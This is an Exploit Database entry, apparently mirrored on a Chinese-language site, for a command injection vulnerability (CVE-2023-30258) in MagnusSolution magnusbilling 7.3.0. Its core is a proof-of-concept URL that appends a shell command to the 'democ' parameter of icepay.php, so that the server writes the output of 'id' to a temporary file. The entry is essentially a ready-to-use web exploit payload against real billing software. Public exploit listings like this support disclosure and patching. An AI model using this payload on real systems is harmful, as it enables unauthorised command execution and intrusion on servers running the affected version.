MagnusSolution magnusbilling 7.3.0 – Command Injection

• Exploit Database
• 6 阅读

• 作者： CodeSecLab
  日期： 2025-04-11
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/52170/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18

  # Exploit Title: MagnusSolution magnusbilling 7.3.0 - Command Injection # Date: 2024-10-26 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/magnussolution/magnusbilling7 # Software Link: https://github.com/magnussolution/magnusbilling7 # Version: 7.3.0 # Tested on: Centos # CVE : CVE-2023-30258     # PoC URL for Command Injection   http://magnusbilling/lib/icepay/icepay.php?democ=testfile; id > /tmp/injected.txt   Result: This PoC attempts to inject the id command.   [Replace Your Domain Name]